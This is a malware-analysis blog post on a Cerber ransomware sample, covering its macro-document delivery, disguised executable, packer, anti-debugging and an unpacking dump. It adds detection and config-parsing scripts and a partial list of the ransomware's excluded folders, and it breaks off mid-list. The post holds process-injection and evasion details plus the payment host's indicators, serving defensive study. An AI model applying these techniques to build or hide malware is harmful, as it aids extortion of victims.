<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKjssVeVzgoAWjws5G0_Tp7yqQ7QHzgX3Iq4W-HMCGrt-upZb0JkZn717fgsHXSn-HHP_-c6WCVqjhKVTWaedBsaHCOVci0pry7W8xM-MInwDficHx14q9ABeNCHzDIifsJJdeOjRQYj8/s1600/mail.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKjssVeVzgoAWjws5G0_Tp7yqQ7QHzgX3Iq4W-HMCGrt-upZb0JkZn717fgsHXSn-HHP_-c6WCVqjhKVTWaedBsaHCOVci0pry7W8xM-MInwDficHx14q9ABeNCHzDIifsJJdeOjRQYj8/s640/mail.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">It contains a .zip whose name partly matches the victim's email address.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQz6iQHXj8fenD2pn-fm_BD7r_8crOGuzlFVkIRkYvsJ9uj5IQ0wkdLnDIi-fB8tMCxXT2_IU69uddqcGKAFHxNfLv4pwbOLLEqnHuUGjp1vM2xzzqr6X7ZTdTs80pybvbeTBag9l0Niw/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQz6iQHXj8fenD2pn-fm_BD7r_8crOGuzlFVkIRkYvsJ9uj5IQ0wkdLnDIi-fB8tMCxXT2_IU69uddqcGKAFHxNfLv4pwbOLLEqnHuUGjp1vM2xzzqr6X7ZTdTs80pybvbeTBag9l0Niw/s640/01.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">On opening the document, an image tells us to enable content (macros).</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFtG33ebS8VF1rWHIOxWYuer9_mQupc0MM73SS38nlqLHx6Ll4vMWlHYTmjyQIl3Igy97r6dlKRFXuFGGwFZrq3lfnT5qy5yFn8H36lWyDiqp1gwiB9ZVb2Fvei88vTDOPW3FXA2hgM4A/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFtG33ebS8VF1rWHIOxWYuer9_mQupc0MM73SS38nlqLHx6Ll4vMWlHYTmjyQIl3Igy97r6dlKRFXuFGGwFZrq3lfnT5qy5yFn8H36lWyDiqp1gwiB9ZVb2Fvei88vTDOPW3FXA2hgM4A/s640/02.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Here are the macros contained in the .DOC</span><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNrS0CBIr4_W1eALR7pIF2LBMKrn8G6pUt-tv0DE2w6y193dQsIIKLYlZ6l6Gfi4uZ7dRLlW6lCSpBBV-s6LxnRpyKyLswGbxpJAPadlJwZuNBIr9nDe5N0TtZWY3aKXaMCkpUeXektU8/s1600/macros.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="520" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNrS0CBIr4_W1eALR7pIF2LBMKrn8G6pUt-tv0DE2w6y193dQsIIKLYlZ6l6Gfi4uZ7dRLlW6lCSpBBV-s6LxnRpyKyLswGbxpJAPadlJwZuNBIr9nDe5N0TtZWY3aKXaMCkpUeXektU8/s640/macros.jpg" width="640" /></a></div>
<b><br /></b>
<span style="font-family: "arial" , "helvetica" , sans-serif;">We run it in a VM and see that it downloads the following item.</span><br />
<b><br /></b>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3Pw6zDxEWGFBZ8e0JImKx4WruEO0w1nbH8DNLDeB02l4Wjxt_QNo5FhkXh4k24YUlxry1Y0ScyRYTc7nqTSxNa_KymLOV76mC4t-3Kg04IDlJSWJXLhE3KfcnVV1HPfQVSOG-aI40hHQ/s1600/download.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3Pw6zDxEWGFBZ8e0JImKx4WruEO0w1nbH8DNLDeB02l4Wjxt_QNo5FhkXh4k24YUlxry1Y0ScyRYTc7nqTSxNa_KymLOV76mC4t-3Kg04IDlJSWJXLhE3KfcnVV1HPfQVSOG-aI40hHQ/s640/download.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Download of the executable with the beloved Malzilla.</span></div>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0MXib1a3H46CzoSUHm6IF02J8tsUDd4MNjnZQKIZq1npFQdqynRClzq4S2nUvxtJJtkzn_9uU20NgXuB0-q3QoqveW_wAsynr3OohAdwxKxgATVhDELbUrwTbLn9iyfd4ShJ3mwsNDOQ/s1600/malzilla.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0MXib1a3H46CzoSUHm6IF02J8tsUDd4MNjnZQKIZq1npFQdqynRClzq4S2nUvxtJJtkzn_9uU20NgXuB0-q3QoqveW_wAsynr3OohAdwxKxgATVhDELbUrwTbLn9iyfd4ShJ3mwsNDOQ/s640/malzilla.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The executable carries the icon of a supposed .pdf</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtwny4PACM-gp10Kv06fxVweNGlzymWGCLeE1A8O9HjS2uGl9JcZGSlBnJprFMY7pYUao6Wv-0bMJ2oJ4ywQclvYWEWstaSZiQes3QALfV-YDbplRIbciVrFHYY_T-OmDkhU0ELjrt3wY/s1600/icono.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtwny4PACM-gp10Kv06fxVweNGlzymWGCLeE1A8O9HjS2uGl9JcZGSlBnJprFMY7pYUao6Wv-0bMJ2oJ4ywQclvYWEWstaSZiQes3QALfV-YDbplRIbciVrFHYY_T-OmDkhU0ELjrt3wY/s1600/icono.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">It uses a Nullsoft packer (<a href="https://es.wikipedia.org/wiki/Nullsoft_Scriptable_Install_System">PiMP SFX</a>)</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi4TvJEa_e6p47GszslfVb0Yv3yhSSm8GFl0JMMH60wODohORdss2noHCb3nqAxTWIW-mcLPbK95HOhxwpompQdgKtbKG_uajqls6jNsHoLNtAL1QrZGMnAxeZWL5Vvp-TulP2-GKyrPU/s1600/06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi4TvJEa_e6p47GszslfVb0Yv3yhSSm8GFl0JMMH60wODohORdss2noHCb3nqAxTWIW-mcLPbK95HOhxwpompQdgKtbKG_uajqls6jNsHoLNtAL1QrZGMnAxeZWL5Vvp-TulP2-GKyrPU/s640/06.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">VirusTotal (VT) analysis, with a minimal detection rate.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj0h7kb86Y3DTQ_V6Jit2optQX1v6hOFSjYg5TqwY5PmH92q-_q4EKdGVcz3nonObt3j3xoQqdJFM-b8Xs12PiQYkO2fyOmfDw-3rEZl1Mw7S_kOa5C_NJBt2_xrwU4x9sPtvgv_LYJCk/s1600/vt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj0h7kb86Y3DTQ_V6Jit2optQX1v6hOFSjYg5TqwY5PmH92q-_q4EKdGVcz3nonObt3j3xoQqdJFM-b8Xs12PiQYkO2fyOmfDw-3rEZl1Mw7S_kOa5C_NJBt2_xrwU4x9sPtvgv_LYJCk/s640/vt.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Anti-debugging function.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyPHLPERg0xZiuOoEQyQTJq9MPxjYrMQLvSmigxHIHUHkQuCX6pnUVlNhulbBN8ulQC2b3ejfVbwmk8rAYzSMqfjBO8OWi2WTcRE3qoyPK14005zNUyhpinN49nw8rvna0rP3jx1vDOFE/s1600/07.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyPHLPERg0xZiuOoEQyQTJq9MPxjYrMQLvSmigxHIHUHkQuCX6pnUVlNhulbBN8ulQC2b3ejfVbwmk8rAYzSMqfjBO8OWi2WTcRE3qoyPK14005zNUyhpinN49nw8rvna0rP3jx1vDOFE/s640/07.jpg" width="404" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSQgj3bQSaQ96syrOgUgiC8HT5ytqizRlkgmyR3EoPTLvuxmxR1zVUqP2h5JWyUeoUuGDja9cJdEoqiK0Om534cgZsVPHL21EkMMqG4u58KsjkmEnPf5ft6DCSa7MTEVlBn5um3u_-Bm4/s1600/08.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSQgj3bQSaQ96syrOgUgiC8HT5ytqizRlkgmyR3EoPTLvuxmxR1zVUqP2h5JWyUeoUuGDja9cJdEoqiK0Om534cgZsVPHL21EkMMqG4u58KsjkmEnPf5ft6DCSa7MTEVlBn5um3u_-Bm4/s640/08.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">We dump at ResumeThread</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFzKHuVnNrlTY7U1J2Z_yh3ttp2RPguS0kEHveW8N9385I0jqPNxflkv6VZh7WzEDLXAJwAx4sGnrRVfIMKxU-FkbNoKemrmhbTPtdcyn1oQPGCD3RW0bf-dS0wG8TMAKFNExBPCdlPjw/s1600/dumper.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFzKHuVnNrlTY7U1J2Z_yh3ttp2RPguS0kEHveW8N9385I0jqPNxflkv6VZh7WzEDLXAJwAx4sGnrRVfIMKxU-FkbNoKemrmhbTPtdcyn1oQPGCD3RW0bf-dS0wG8TMAKFNExBPCdlPjw/s640/dumper.jpg" width="640" /></a></div>
<br />
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Strings obtained from the dump</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvHd5DjmH7SaZuG77CeWH0dsUbCcjOhkCma1lMD4EUzfVIj940M4-8SiwnhUWJ7oLyuHZaAK1suKr9i-9a5Ixp0P52otFP_KNEcX_1khD1zPIexfP3rgw2SXiycC1jIjjsm_KFaCsvxPE/s1600/text.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvHd5DjmH7SaZuG77CeWH0dsUbCcjOhkCma1lMD4EUzfVIj940M4-8SiwnhUWJ7oLyuHZaAK1suKr9i-9a5Ixp0P52otFP_KNEcX_1khD1zPIexfP3rgw2SXiycC1jIjjsm_KFaCsvxPE/s640/text.jpg" width="640" /></a></div>
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">VT analysis without the crypter.</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis8dhpL6LSLBVz2ddVfmx8aj5Bhb5Z45YT76_0zYa_ex5q0ifoq1G4CPCwEi31ZNkyqTttLVJ-Ky8C0lcwUQDMvnHvsuE5-0Cj5oXx3PxhVeF4ned-okSv3bNKHzxpa9LLW3h2d_aYPhE/s1600/vt2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis8dhpL6LSLBVz2ddVfmx8aj5Bhb5Z45YT76_0zYa_ex5q0ifoq1G4CPCwEi31ZNkyqTttLVJ-Ky8C0lcwUQDMvnHvsuE5-0Cj5oXx3PxhVeF4ned-okSv3bNKHzxpa9LLW3h2d_aYPhE/s640/vt2.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
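<div class="separator" style="clear: both; text-align: left;"><span style="font-family: "arial" , "helvetica" , sans-serif;">The post dumps the unpacked payload when execution reaches ResumeThread. As an added example (not the author's code, and not any sandbox's real output), the script below assumes the usual reason for choosing that breakpoint: a crypter creates a child process suspended, writes the decrypted payload into it, and only then resumes it, so at ResumeThread the payload is complete in memory. It scores that call sequence in a constructed API-call trace, which is also a usable detection rule for the same behaviour; the trace format, PIDs and sizes are invented for the demonstration.</span></div>

```python
"""Flag a suspended-process injection sequence that ends in ResumeThread.

Added example for this post, not the author's or any sandbox's code. The post
only shows that the unpacked payload was dumped at ResumeThread; this script
assumes the usual reason for that choice (create a process suspended, write the
payload into it, then resume it) and scores that sequence in a constructed trace.
"""
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit of CreateProcess (Win32)

# Constructed trace: one dict per call, as an API monitor might log it.
SAMPLE_TRACE = [
    {"pid": 1200, "api": "CreateProcessW", "args": {"target_pid": 1340, "flags": 0x4}},
    {"pid": 1200, "api": "WriteProcessMemory", "args": {"target_pid": 1340, "size": 204800}},
    {"pid": 1200, "api": "SetThreadContext", "args": {"target_pid": 1340}},
    {"pid": 1200, "api": "ResumeThread", "args": {"target_pid": 1340}},
    # benign: a normal (non-suspended) child, resumed without any memory writes
    {"pid": 900, "api": "CreateProcessW", "args": {"target_pid": 910, "flags": 0x0}},
    {"pid": 900, "api": "ResumeThread", "args": {"target_pid": 910}},
]


def find_hollowing(trace):
    """Return one alert per (caller, target) whose child was created suspended,
    written to, and then resumed. The alert fires on ResumeThread, which is also
    the moment the written payload is complete and therefore worth dumping."""
    seen = defaultdict(set)  # (caller pid, target pid) -> steps observed so far
    alerts = []
    for ev in trace:
        key = (ev["pid"], ev["args"].get("target_pid"))
        api, args = ev["api"], ev["args"]
        if api.startswith("CreateProcess") and args.get("flags", 0) & CREATE_SUSPENDED:
            seen[key].add("created_suspended")
        elif api == "WriteProcessMemory" and "created_suspended" in seen[key]:
            seen[key].add("payload_written")
        elif api == "SetThreadContext" and "payload_written" in seen[key]:
            seen[key].add("entry_point_changed")
        elif api == "ResumeThread" and "payload_written" in seen[key]:
            alerts.append({"caller": ev["pid"], "target": key[1], "steps": sorted(seen[key])})
    return alerts


if __name__ == "__main__":
    for alert in find_hollowing(SAMPLE_TRACE):
        print(f"pid {alert['caller']} injected into pid {alert['target']}: {alert['steps']}")
```

<div class="separator" style="clear: both; text-align: left;"><span style="font-family: "arial" , "helvetica" , sans-serif;">The benign child (pid 910) is resumed but never written to, so it produces no alert; only the pair that went through suspended creation and a memory write is reported.</span></div>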
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Dynamic test.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMfzCNW9PdrlpVNdAVlF0kU2-iooUO7gUY8L9n8ZC7ECuZhkahsSs_CA-Le-Zj7vN_iT2XZonBkiQ5mrIPl0PFl2xmqSIPpUXFtkBvPJLoPXE0-uqSE9JH65A5UbsZeUwhMI3CTvnVpkI/s1600/04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMfzCNW9PdrlpVNdAVlF0kU2-iooUO7gUY8L9n8ZC7ECuZhkahsSs_CA-Le-Zj7vN_iT2XZonBkiQ5mrIPl0PFl2xmqSIPpUXFtkBvPJLoPXE0-uqSE9JH65A5UbsZeUwhMI3CTvnVpkI/s640/04.jpg" width="640" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoJIFqYltWuox7lhFCcOjZEmW3M6R4-_lUpODP5svhYMaWPfF_E8Nnc1708SSNgLiHL8LaPojW7mowBBzMWZK1HJRmpCWkCniF8Qkv-MFk7fsw1PT9cTj8sY6iafkWwKGYvAGT0AR3NYI/s1600/05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="345" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoJIFqYltWuox7lhFCcOjZEmW3M6R4-_lUpODP5svhYMaWPfF_E8Nnc1708SSNgLiHL8LaPojW7mowBBzMWZK1HJRmpCWkCniF8Qkv-MFk7fsw1PT9cTj8sY6iafkWwKGYvAGT0AR3NYI/s640/05.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
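<div class="separator" style="clear: both; text-align: left;"><span style="font-family: "arial" , "helvetica" , sans-serif;">The config strings dumped below list the folders the ransomware skips, the database and mail processes it closes before encrypting, the file extensions it targets, the .onion host of the payment page and the tor2web gateways it offers as clearnet mirrors. As an added example (not the author's code and not Cerber's), the script below parses such a flat string dump into a structured config and turns it into two things a responder wants: a check of which files on a host were actually at risk (folder exclusions plus extension whitelist) and the list of hostnames to block or hunt for in DNS and proxy logs. The parser assumes the section keywords ('folders', 'process', 'files', 'tor', 'site_N') precede their values, as they do in the post's dump; the excerpt, file paths and DNS log lines are constructed for the demonstration.</span></div>

```python
"""Triage helper for a Cerber-style config string dump.

Added example for this post, not the author's code nor Cerber's. It assumes the
dump is a flat sequence of strings in which the keywords 'folders', 'process',
'files', 'tor' and 'site_N' precede their values, as in the post's dump. The
sample dump, file paths and DNS log lines are constructed for the demonstration.
"""
import re
from dataclasses import dataclass, field

# Constructed excerpt of the string dump shown in the post (order preserved).
SAMPLE_DUMP = [
    "folders", ":\\$recycle.bin\\", ":\\program files (x86)\\", ":\\windows\\",
    "\\appdata\\local\\", "\\tor browser\\",
    "close_process", "process", "sqlservr.exe", "mysqld.exe", "oracle.exe",
    "encrypt", "files", ".7z", ".accdb",
    "tor", "p27dokhpz2n7nvgr",
    "site_1", "onion.to", "site_2", "tor2web.org",
]

SECTION_KEYS = {"folders", "process", "files", "tor"}


@dataclass
class CerberConfig:
    excluded_folders: list = field(default_factory=list)   # path fragments never touched
    kill_processes: list = field(default_factory=list)     # services closed before encryption
    target_extensions: list = field(default_factory=list)  # extensions that get encrypted
    onion_host: str = ""                                   # payment site without ".onion"
    tor2web_gateways: list = field(default_factory=list)   # clearnet proxies to the onion


def parse_dump(lines):
    """Walk the flat string dump and bucket each value under the keyword preceding it."""
    cfg = CerberConfig()
    section = None
    for raw in lines:
        s = raw.strip()
        if not s:
            continue
        if s in SECTION_KEYS:
            section = s
            continue
        if re.fullmatch(r"site_\d+", s):
            section = "site"
            continue
        if section == "folders" and s.endswith("\\"):
            cfg.excluded_folders.append(s.lower())
        elif section == "process" and s.lower().endswith(".exe"):
            cfg.kill_processes.append(s.lower())
        elif section == "files" and s.startswith("."):
            cfg.target_extensions.append(s.lower())
        elif section == "tor":
            cfg.onion_host = s          # a single value follows the 'tor' key
            section = None
        elif section == "site":
            cfg.tor2web_gateways.append(s.lower())
            section = None
        # other strings ('encrypt', 'close_process', stray values) are ignored
    return cfg


def would_encrypt(cfg, path):
    """Apply the folder exclusions and the extension whitelist to one file path."""
    p = path.lower().replace("/", "\\")
    if any(folder in p for folder in cfg.excluded_folders):
        return False
    return any(p.endswith(ext) for ext in cfg.target_extensions)


def network_iocs(cfg):
    """Hostnames a victim would resolve: the onion itself and each tor2web mirror."""
    return [f"{cfg.onion_host}.onion"] + [f"{cfg.onion_host}.{gw}" for gw in cfg.tor2web_gateways]


def flag_dns(cfg, log_lines):
    """Return the log lines whose queried name (last field) matches a derived IoC."""
    iocs = set(network_iocs(cfg))
    return [line for line in log_lines if line.split()[-1].lower().rstrip(".") in iocs]


# Constructed DNS log lines (format: timestamp client 'query' type name).
SAMPLE_DNS_LOG = [
    "2016-12-29T10:01:02Z 10.0.0.15 query A p27dokhpz2n7nvgr.onion.to",
    "2016-12-29T10:01:05Z 10.0.0.15 query A www.example.com",
    "2016-12-29T10:02:11Z 10.0.0.22 query A p27dokhpz2n7nvgr.tor2web.org",
]

if __name__ == "__main__":
    cfg = parse_dump(SAMPLE_DUMP)
    print("block on DNS/proxy:", network_iocs(cfg))
    print("services stopped before encryption:", cfg.kill_processes)
    for path in (r"C:\Users\bob\Documents\backup.7z", r"C:\Windows\Temp\cache.7z",
                 r"C:\Users\bob\AppData\Local\app.accdb"):
        print(path, "->", "at risk" if would_encrypt(cfg, path) else "skipped")
    for hit in flag_dns(cfg, SAMPLE_DNS_LOG):
        print("DNS hit:", hit)
```

<div class="separator" style="clear: both; text-align: left;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Two points worth noting from the run: a file under \appdata\local\ or :\windows\ is skipped even when its extension is on the list, which is why profile and system folders survive while user documents do not, and the tor2web mirrors matter for detection because a victim with no Tor client will still reach the payment page through ordinary DNS lookups of onion.to, onion.cab and the rest.</span></div>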
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Part of the ransomware's config</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ntuser.dat</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">thumbs.db</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">folders</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\$getcurrent\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\$recycle.bin\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\$windows.~bt\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\$windows.~ws\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\boot\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\documents and settings\all users\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\documents and settings\default user\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\documents and settings\localservice\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\documents and settings\networkservice\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\intel\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\msocache\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\perflogs\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\program files (x86)\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\windows10upgrade\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\program files\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\programdata\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\recovery\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\recycled\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\recycler\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\system volume information\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\temp\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\windows.old\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\appdata\local\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\windows\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\winnt\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">%I64d</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\appdata\locallow\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\appdata\roaming\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\local settings\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\public\music\sample music\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\public\pictures\sample pictures\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\public\videos\sample videos\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\tor browser\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">languages</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+-0123456789.Ee</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0</span></div>
<div class="separator" style="clear: both;">
